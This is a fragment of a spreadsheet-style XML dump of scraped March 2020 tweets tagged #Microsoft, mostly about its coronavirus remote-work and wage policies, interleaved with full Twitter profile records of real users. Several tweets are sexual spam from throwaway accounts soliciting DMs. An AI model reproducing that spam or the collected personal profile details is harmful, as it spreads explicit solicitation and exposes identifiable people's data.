    <t>Be nice to me. I am a good girl! #Clarksville   #microsoft #instagood https://t.co/DGtqyoxPPP</t>
  </si>
  <si>
    <t>{'id': 1235617727999627266, 'id_str': '1235617727999627266', 'name': 'Ulyssa Alicea', 'screen_name': 'AliceaLeracari', 'location': 'Bridgeport, USA', 'description': 'You are my best friend, my human diary and my other half. You mean the world to me and I LOVE YOU.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Thu Mar 05 17:26:44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'http://pbs.twimg.com/profile_images/1235641735713296384/nZoPuwEy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235641735713296384/nZoPuwEy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235617727999627266/1583434968',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</si>
  <si>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03:45:02 +0000 2020</t>
  </si>
  <si>
    <t>Do you know that you could reset your Teams Screen with this Zoom Reset button?
*Just with 2 simple steps!*
Ever encounter where you accidentally Zoom Out/In too much of your Teams Screen &amp;amp; you have difficulty viewing the screen
@UniQ_Consulting 
#Teams #Microsoft #Tips #Tricks https://t.co/TGv5jy6ZSO</t>
  </si>
  <si>
    <t>{'id': 2427974431, 'id_str': '2427974431', 'name': 'Sabrina Kay', 'screen_name': 'oh_is_sabrina', 'location': 'Malaysia', 'description': 'Consultant @UniQ_Consulting | occasionally PowerShell scripting | Dreamer | â¤ï¸ðŸ• | Hide &amp; Seek Master |  my blog below â¬‡ï¸â¬‡ï¸â¬‡ï¸', 'url': 'https://t.co/TgOrM5Kfm0', 'entities': {'url': {'urls': [{'url': 'https://t.co/TgOrM5Kfm0', 'expanded_url': 'http://sabrinaksy.wordpress.com', 'display_url': 'sabrinaksy.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 94, 'friends_count': 243, 'listed_count': 1, 'created_at': 'Fri Apr 04 23:15:05 +0000 2014', 'favourites_count': 560, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 951,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'http://pbs.twimg.com/profile_images/1235587093675442181/j-En7L3L_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235587093675442181/j-En7L3L_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2427974431/1574697221',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</si>
  <si>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03:45:00 +0000 2020</t>
  </si>
  <si>
    <t>"Tractor Supply Expands Partnership With #Microsoft " | @HomeworldNews https://t.co/1ZaPc3YXcw</t>
  </si>
  <si>
    <t>{'id': 29158495, 'id_str': '29158495', 'name': 'Jami Goodwin Medina', 'screen_name': 'HeyladyJami', 'location': 'Birmingham, AL', 'description': 'Tech geek with @data_4_people. Pop culture maven, lover of all things #geekchic. Lifelong do-gooder. ENTJ. Opinions = own, RT ðŸš« endorsement', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1946, 'friends_count': 5001, 'listed_count': 102, 'created_at': 'Mon Apr 06 06:51:25 +0000 2009', 'favourites_count': 2338, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5210,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'http://pbs.twimg.com/profile_images/759782885448495104/xgUUak44_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/759782885448495104/xgUUak44_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29158495/1426601962',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</si>
  <si>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03:40:36 +0000 2020</t>
  </si>
  <si>
    <t>It is nice of #Microsoft to pay full wages to hourly vendors who support our campus in #remotework situation https://t.co/YbwFKsrQqp</t>
  </si>
  <si>
    <t>{'id': 3224650320, 'id_str': '3224650320', 'name': 'Sameer Khandekar', 'screen_name': 'sameerIOTApps', 'location': 'Seattle, WA', 'description': 'Sr Software Engineer @Microsoft. Fan of #Azure, #IoT, #Xamarin Mobile Apps, #Arduino, #RaspberryPi (Not in any order). The opinions are my own.', 'url': 'https://t.co/mt7GfOv39A', 'entities': {'url': {'urls': [{'url': 'https://t.co/mt7GfOv39A', 'expanded_url': 'https://www.linkedin.com/in/sameerk1', 'display_url': 'linkedin.com/in/sameerk1', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 314, 'friends_count': 762, 'listed_count': 38, 'created_at': 'Sun May 24 01:25:22 +0000 2015', 'favourites_count': 389, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 595,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'http://pbs.twimg.com/profile_images/604176732896108544/2DdHXTKn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/604176732896108544/2DdHXTKn_normal.jpg',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</si>
  <si>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Fri Mar 06 03:35:32 +0000 2020</t>
  </si>
  <si>
    <t>Bruh ok that dick I just received was a 11/10 #West Virginia   #microsoft #song https://t.co/PMXxNhzMaZ</t>
  </si>
  <si>
    <t>{'id': 1235649182393917440, 'id_str': '1235649182393917440', 'name': 'Kendra Schmalz', 'screen_name': 'insartheotrac', 'location': 'Lafayette, USA', 'description': 'Your love is all I need to feel complete.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 6, 'listed_count': 0, 'created_at': 'Thu Mar 05 19:31:47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'http://pbs.twimg.com/profile_images/1235656674997923840/K66MiiWu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235656674997923840/K66MiiWu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235649182393917440/1583438516',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</si>
  <si>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03:31:40 +0000 2020</t>
  </si>
  <si>
    <t>The tongue in the mouth itches ... wildly I want to lick something  #El Cajon   #microsoft #applemusic https://t.co/YeMhUCaIsW</t>
  </si>
  <si>
    <t>{'id': 1235514682590613509, 'id_str': '1235514682590613509', 'name': 'Katherine Brooks', 'screen_name': 'eztradresuf', 'location': 'Huntsville, USA', 'description': 'There is no more lovely, friendly, and charming relationship, communion or company than a good marriage', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Thu Mar 05 10:37:21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'http://pbs.twimg.com/profile_images/1235537822167293953/94ygCLDB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235537822167293953/94ygCLDB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235514682590613509/1583410190',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</si>
  <si>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03:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks employees in US to work from home until March 25 amid coronavirus threat....... #UnitedStates #Coronavirus #Microsoft #Seattle #California #SanFrancisco #CoronavirusOutbreak #COVID19 #COVID19 #COVID19US https://t.co/OrSB520hNJ</t>
  </si>
  <si>
    <t>Fri Mar 06 03:25:55 +0000 2020</t>
  </si>
  <si>
    <t>Good on you #Microsoft !
https://t.co/U1mvjnaMzb</t>
  </si>
  <si>
    <t>{'id': 14931711, 'id_str': '14931711', 'name': 'ZL', 'screen_name': 'fatguppy', 'location': 'Singapore', 'description': 'SaaS, Big Compute/Big Data, Analytics, Cloud, AI/ML/HPC, Security, Social, Start-Ups/FinTech. SANS, SGNOG, APNIC, APRICOT, ICANN. All tweets are biased.', 'url': 'https://t.co/0pRrEP0Hlc', 'entities': {'url': {'urls': [{'url': 'https://t.co/0pRrEP0Hlc', 'expanded_url': 'http://www.rescale.com', 'display_url': 'rescale.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 279, 'friends_count': 762, 'listed_count': 45, 'created_at': 'Wed May 28 08:17:20 +0000 2008', 'favourites_count': 50, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1166,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'http://pbs.twimg.com/profile_images/481264191970369536/XW5VqP6u_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/481264191970369536/XW5VqP6u_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14931711/1487751288',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</si>
  <si>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Mar 06 03:25:02 +0000 2020</t>
  </si>
  <si>
    <t>Funny how things sometimes revert back to older designs. Change for change sake does not always work.
#Windows #StartMenu #LiveTiles #Microsoft
https://t.co/vNqVHUcxTJ</t>
  </si>
  <si>
    <t>{'id': 2201987285, 'id_str': '2201987285', 'name': 'The Portal Connector', 'screen_name': 'CRMPortal', 'location': 'Ontario, Canada', 'description': 'The Portal Connector for Dynamics CRM / 365 and the Power Platform. Provides rich, customizable web portals with an easy to use, drag and drop interface.', 'url': 'https://t.co/jEsLjrkLkm', 'entities': {'url': {'urls': [{'url': 'https://t.co/jEsLjrkLkm', 'expanded_url': 'https://www.portalconnector.com', 'display_url': 'portalconnector.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 694, 'friends_count': 698, 'listed_count': 47, 'created_at': 'Sat Nov 30 16:51:16 +0000 2013', 'favourites_count': 733, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6658,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'http://pbs.twimg.com/profile_images/1212745431534440451/g4UqCykr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212745431534440451/g4UqCykr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2201987285/1577976095', 'profile_link_color': '007AB3',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</si>
  <si>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03:23:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's original #Halo game is now available on PC https://t.co/quBSsIIZkk via @tomwarren @verge</t>
  </si>
  <si>
    <t>{'id': 18846117, 'id_str': '18846117', 'name': 'webcode', 'screen_name': 'webcode', 'location': '.to .ca', 'description': 'ðŸ‡¨ðŸ‡¦ // @sikander', 'url': 'https://t.co/T3y4ewKjhr', 'entities': {'url': {'urls': [{'url': 'https://t.co/T3y4ewKjhr', 'expanded_url': 'https://webcode.ca', 'display_url': 'webcode.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 107, 'friends_count': 397, 'listed_count': 17, 'created_at': 'Sat Jan 10 20:54:07 +0000 2009', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4011,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'http://pbs.twimg.com/profile_images/891803698677952513/2h6EotP-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/891803698677952513/2h6EotP-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18846117/1525388361',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</si>
  <si>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03:22:33 +0000 2020</t>
  </si>
  <si>
    <t>Class act by @Microsoft.
When companies show a huge heart and empathy for their employees over profits, it speaks loudly to it's employees.
It also shows other companies how to run a business in America!
#Microsoft
#MicrosoftTeams #coronavirus 
@CNN 
https://t.co/feohyvw800</t>
  </si>
  <si>
    <t>{'id': 969703152269193216, 'id_str': '969703152269193216', 'name': 'Shaunna Veronica', 'screen_name': 'Galleria512', 'location': 'Portland OR. &amp; Seattle, WA.', 'description': 'Photographer-Artist-Proud Parent-Entrepreneur&amp; Professionally single with a lunatic asylum sense of humor. Iâ€™m 5â€™12 &amp; I promise Iâ€™ll never get to 6 feet tall!ðŸ˜œ', 'url': 'https://t.co/1BdZb858RZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/1BdZb858RZ', 'expanded_url': 'http://Galleria512.com', 'display_url': 'Galleria512.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 174, 'friends_count': 139, 'listed_count': 2, 'created_at': 'Fri Mar 02 22:37:02 +0000 2018', 'favourites_count': 582, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 138,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'http://pbs.twimg.com/profile_images/969706042194935808/w5uBX1a7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/969706042194935808/w5uBX1a7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/969703152269193216/1582207281',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</si>
  <si>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03:21:53 +0000 2020</t>
  </si>
  <si>
    <t>I'm proud to work for such an #ethical and #responsible company.
#COVID19
#Microsoft 
https://t.co/U37yAuatxS</t>
  </si>
  <si>
    <t>{'id': 1350363212, 'id_str': '1350363212', 'name': 'Dennis Garcia âš–', 'screen_name': 'DennisCGarcia', 'location': 'The Windy City', 'description': 'Assistant #GeneralCounsel @Microsoft solving problems, enabling business, earning trust, leading teams, managing risk, navigating change + embracing integrity.', 'url': 'https://t.co/s95yZXOOLl', 'entities': {'url': {'urls': [{'url': 'https://t.co/s95yZXOOLl', 'expanded_url': 'https://www.dennisgarciablog.com/', 'display_url': 'dennisgarciablog.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2498, 'friends_count': 1439, 'listed_count': 501, 'created_at': 'Sat Apr 13 22:14:53 +0000 2013', 'favourites_count': 14570, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 21251,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'http://pbs.twimg.com/profile_images/861065515409788929/ADIqNeMw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/861065515409788929/ADIqNeMw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1350363212/1571994813',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</si>
  <si>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03:18:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #Bungie Enact Work-From-Home Policies In Response To #Coronavirus https://t.co/oIZWIzc02o</t>
  </si>
  <si>
    <t>{'id': 810745981, 'id_str': '810745981', 'name': 'Kate Moore ðŸŽ—ï¸', 'screen_name': 'Little_Sparowe', 'location': '', 'description': 'Author of the Steamlog series on TAY, and for the #RomanEmpire.  RTs reflect interest, not necessarily my opinion.  #ThankYouRoman ðŸ§¡', 'url': 'https://t.co/v3OYouYQwk', 'entities': {'url': {'urls': [{'url': 'https://t.co/v3OYouYQwk', 'expanded_url': 'https://kinja.com/katemoore', 'display_url': 'kinja.com/katemoore', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 497, 'friends_count': 206, 'listed_count': 17, 'created_at': 'Sat Sep 08 11:32:11 +0000 2012', 'favourites_count': 51749, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 27361, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9266CC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1221218488468983808/zKi2FBvG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221218488468983808/zKi2FBvG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/810745981/1557710518',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</si>
  <si>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03:17:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft providing full wages to hourly workers during coronavirus response -- good job team!
#Microsoft #coronavirus #CoronaVirusSeattle
https://t.co/Wb9qwKjOxd</t>
  </si>
  <si>
    <t>{'id': 1188230962548633600, 'id_str': '1188230962548633600', 'name': 'Alan', 'screen_name': '_alansl', 'location': 'Seattle, WA', 'description': 'Recovering scientist. Currently strategy @ Microsoft. Dreaming about making sci-fi into reality.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 46, 'listed_count': 0, 'created_at': 'Sat Oct 26 23:08:43 +0000 2019', 'favourites_count': 7,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'http://pbs.twimg.com/profile_images/1218703459483975680/KIFtHrz3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218703459483975680/KIFtHrz3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1188230962548633600/1579396677',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</si>
  <si>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03:16:12 +0000 2020</t>
  </si>
  <si>
    <t>Who wants some private nudes ? Dm me #New York   #microsoft #dance https://t.co/XTsFL58Gb7</t>
  </si>
  <si>
    <t>{'id': 1235710792462462976, 'id_str': '1235710792462462976', 'name': 'Yvette Bautista', 'screen_name': 'toadiscompders', 'location': 'Yonkers, USA', 'description': 'You know youâ€™re in love when you canâ€™t fall asleep because reality is finally better than your dreams', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 31, 'listed_count': 0, 'created_at': 'Thu Mar 05 23:36:31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'http://pbs.twimg.com/profile_images/1235717017719750656/U5LYR0IE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235717017719750656/U5LYR0IE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235710792462462976/1583452894',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</si>
  <si>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03:12:23 +0000 2020</t>
  </si>
  <si>
    <t>Haven't used #Windows or played #Halo with a controller in a long time. Apparently Windows now has a built in video editor and trimming tool. #Microsoft doing some good work here apparently.  Not doing great at Halo, but enjoying it nonetheless. https://t.co/JtK0O9CRPX</t>
  </si>
  <si>
    <t>{'id': 1150981872178126856, 'id_str': '1150981872178126856', 'name': 'Marcus Adams', 'screen_name': 'marcusdeanadams', 'location': '', 'description': 'Army Veteran, IT specialist, school bus driver, diesel mechanic, tech and security enthusiast, gamer.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 791, 'listed_count': 0, 'created_at': 'Tue Jul 16 04:13:57 +0000 2019', 'favourites_count': 1010, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1022,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</si>
  <si>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03:11:30 +0000 2020</t>
  </si>
  <si>
    <t>@TotalAdvantageG @MicrosoftStore @Maggstor @EpyonGaming @WatchMixer @dblxplabs @my16VIT This is so cool. Hoping we can get all of TAs content creators to be a part of a cool opportunity like this at some point! #Microsoft #weareTA</t>
  </si>
  <si>
    <t>{'id': 319526095, 'id_str': '319526095', 'name': 'ðŸ¤˜ðŸ» Fluu', 'screen_name': 'Fluuzone', 'location': 'Salt Lake City, UT', 'description': 'Modern Warfare Content Creator for @TotalAdvantageG // Building Better Content Every Day // Road to 1K YouTube Subs // Music Producer', 'url': 'https://t.co/VctGqgya7b', 'entities': {'url': {'urls': [{'url': 'https://t.co/VctGqgya7b', 'expanded_url': 'https://www.youtube.com/channel/UCKDmnjaCSRDitdzCPZwKFsg', 'display_url': 'youtube.com/channel/UCKDmnâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1991, 'friends_count': 1515, 'listed_count': 27, 'created_at': 'Sat Jun 18 08:10:59 +0000 2011', 'favourites_count': 6922, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 26589,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'http://pbs.twimg.com/profile_images/1233252883509870592/6Ev_rT7j_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233252883509870592/6Ev_rT7j_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/319526095/1582866022', 'profile_link_color': '981CEB',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</si>
  <si>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03:05:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft $MSFT will pay hourly workers regularly even if they spend less time on the clock because of #Coronavirus https://t.co/1zX7Wgo8Kq https://t.co/OjNBzkmF81</t>
  </si>
  <si>
    <t>Fri Mar 06 03:03:22 +0000 2020</t>
  </si>
  <si>
    <t>Good Morning my papi  Will you Fuck me ? #Chemung County   #microsoft #cat https://t.co/6WTNUlKFhi</t>
  </si>
  <si>
    <t>{'id': 1235694519787667457, 'id_str': '1235694519787667457', 'name': 'Amanda Hernandez', 'screen_name': 'davertaife', 'location': 'Eugene, USA', 'description': 'Love is the answer, and you know that for sure', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Thu Mar 05 22:31:52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'http://pbs.twimg.com/profile_images/1235696483724333058/_fNqytOj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235696483724333058/_fNqytOj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235694519787667457/1583448036',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</si>
  <si>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03:00:57 +0000 2020</t>
  </si>
  <si>
    <t>[Archive] Load balancing #ADFS and ADFS Proxy using #Citrix ADC https://t.co/qpSExWhD2M #citrixadc #microsoft #netscaler</t>
  </si>
  <si>
    <t>Fri Mar 06 03:00:49 +0000 2020</t>
  </si>
  <si>
    <t>Avanade offers #Microsoft #Dynamics AX Development Services covering Mobile Apps, Integraions, ERP and CRM --&amp;gt; https://t.co/NCQlRwXE4o &amp;lt;-- March 05, 2020 at 10:00PM</t>
  </si>
  <si>
    <t>{'id': 17400717, 'id_str': '17400717', 'name': 'normanray', 'screen_name': 'normanray', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 465, 'listed_count': 2, 'created_at': 'Sat Nov 15 02:43:26 +0000 2008', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 237,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'http://pbs.twimg.com/profile_images/1111689098891268096/K8f1gm0f_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111689098891268096/K8f1gm0f_normal.png',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</si>
  <si>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03:00:38 +0000 2020</t>
  </si>
  <si>
    <t>As we work to protect public health, we also need to protect the income of hourly workers who support our campus - #Microsoft on the Issues #coronavirus #covid #COVID19 #COVID19seattle #COVID19  https://t.co/xIWebwjYJC</t>
  </si>
  <si>
    <t>{'id': 8858442, 'id_str': '8858442', 'name': 'Kim LaFleur', 'screen_name': 'klafleur', 'location': 'Los Angeles, CA.', 'description': 'Digital Marketing &amp; Merchandising | Ecommerce | Adviser | STO &amp; Blockchain Enthusiast', 'url': 'https://t.co/ZF1owArjb7', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZF1owArjb7', 'expanded_url': 'http://www.linkedin.com/in/kimlafleur', 'display_url': 'linkedin.com/in/kimlafleur', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 273, 'friends_count': 865, 'listed_count': 40, 'created_at': 'Thu Sep 13 17:27:07 +0000 2007', 'favourites_count': 641, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1079,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'http://pbs.twimg.com/profile_images/1170823803154264064/nDQaO7bt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1170823803154264064/nDQaO7bt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/8858442/1571408045',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</si>
  <si>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03:00:17 +0000 2020</t>
  </si>
  <si>
    <t>Join us for our upcoming #KnowledgeMining session!  This is a great opportunity to get insights from the #Microsoft leadership team on the power of #AzureCognitiveSearch and how this ties in with our #KnowledgeMining offering.
#azure #arinco #knowledgemining https://t.co/vDuRRMmvQ9</t>
  </si>
  <si>
    <t>{'id': 1101962921624535041, 'id_str': '1101962921624535041', 'name': 'arincoau', 'screen_name': 'arincoau', 'location': '', 'description': "Amplifying your organisation's intelligence.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 4, 'listed_count': 0, 'created_at': 'Sat Mar 02 21:50:08 +0000 2019', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1101964263130722304/YR4v6Whq_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1101964263130722304/YR4v6Whq_normal.png',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</si>
  <si>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02:58:18 +0000 2020</t>
  </si>
  <si>
    <t>I love when a guy is on top #Scottsdale   #fat #microsoft https://t.co/FMgenIlx9g</t>
  </si>
  <si>
    <t>{'id': 1235694276648013826, 'id_str': '1235694276648013826', 'name': 'Tiffany Clark', 'screen_name': 'liresates', 'location': 'Kansas City, USA', 'description': 'Pleasure of love lasts but a moment. Pain of love lasts a lifetime.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 19, 'listed_count': 0, 'created_at': 'Thu Mar 05 22:30:54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'http://pbs.twimg.com/profile_images/1235696280229339137/92mTuWHe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235696280229339137/92mTuWHe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235694276648013826/1583447955',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</si>
  <si>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02:55:43 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will be carbon negative by 2030
#carbon footprint #Microsoft
https://t.co/eZofW9TiOb</t>
  </si>
  <si>
    <t>{'id': 708704803648438272, 'id_str': '708704803648438272', 'name': 'Developer Insider', 'screen_name': 'DevsInsider', 'location': 'India', 'description': 'From the developer to the developer.\n\nhttps://t.co/5JntU7yyn4 |\nhttps://t.co/TJCRTcD1z0 | https://t.co/lT17plGnLx | \nhttps://t.co/KJiAzvMmXY', 'url': 'https://t.co/4QmgTmW0D8', 'entities': {'url': {'urls': [{'url': 'https://t.co/4QmgTmW0D8', 'expanded_url': 'https://developerinsider.co', 'display_url': 'developerinsider.co', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/5JntU7yyn4', 'expanded_url': 'http://developerinsider.co', 'display_url': 'developerinsider.co', 'indices': [38, 61]}, {'url': 'https://t.co/TJCRTcD1z0', 'expanded_url': 'http://tech.developerinsider.co', 'display_url': 'tech.developerinsider.co', 'indices': [64, 87]}, {'url': 'https://t.co/lT17plGnLx', 'expanded_url': 'http://interview.developerinsider.co', 'display_url': 'interview.developerinsider.co', 'indices': [90, 113]}, {'url': 'https://t.co/KJiAzvMmXY', 'expanded_url': 'http://getappbox.com', 'display_url': 'getappbox.com', 'indices': [117, 140]}]}}, 'protected': False, 'followers_count': 916, 'friends_count': 2, 'listed_count': 8, 'created_at': 'Sat Mar 12 17:22:47 +0000 2016', 'favourites_count': 84, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 22592,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'http://pbs.twimg.com/profile_images/714664402339934208/v6KVuKLb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/714664402339934208/v6KVuKLb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/708704803648438272/1460869973',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</si>
  <si>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02:55:40 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#Microsoft 365 #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:38 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#Dynamics 365 #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#customers #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:36 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#AI #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#The Official Microsoft Blog #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:35 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#Featured #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:34 +0000 2020</t>
  </si>
  <si>
    <t>We are the dream of our ancestors
#Blacks at Microsoft #Microsoft
https://t.co/PYx8yD7XM8</t>
  </si>
  <si>
    <t>We are the dream of our ancestors
#Black History Month #Microsoft
https://t.co/PYx8yD7XM8</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:33 +0000 2020</t>
  </si>
  <si>
    <t>We are the dream of our ancestors
#Featured #Microsoft
https://t.co/PYx8yD7XM8</t>
  </si>
  <si>
    <t>This will ensure that, in Puget Sound for example, the 4,500 hourly employees who work in our facilities will continue to receive their regular wages even if their work hours are reduced. #microsoft #coronavirus #remoteworking #businesscontinuity  https://t.co/zny6YXWU8Z</t>
  </si>
  <si>
    <t>{'id': 121087649, 'id_str': '121087649', 'name': 'Chris Marsh', 'screen_name': 'ChrisMarshSF', 'location': 'San Francisco, CA', 'description': 'I lead a fantastic team providing strategy, market &amp; competitive intel on tools &amp; practices driving the #futureofwork. @451research @ @SPGMarketIntel. My views', 'url': 'https://t.co/z9pBJMHg0f', 'entities': {'url': {'urls': [{'url': 'https://t.co/z9pBJMHg0f', 'expanded_url': 'http://www.451research.com', 'display_url': '451research.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1821, 'friends_count': 580, 'listed_count': 186, 'created_at': 'Mon Mar 08 11:54:53 +0000 2010', 'favourites_count': 1321, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3374,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'http://pbs.twimg.com/profile_images/1221175620819812353/xI1b9Xvr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221175620819812353/xI1b9Xvr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/121087649/1574955091', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': 'ADDBD3', 'profile_sidebar_fill_color': 'CCDFFF', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:32 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Building a better future together
#inclusion #Microsoft
https://t.co/3KnEbF3AWq</t>
  </si>
  <si>
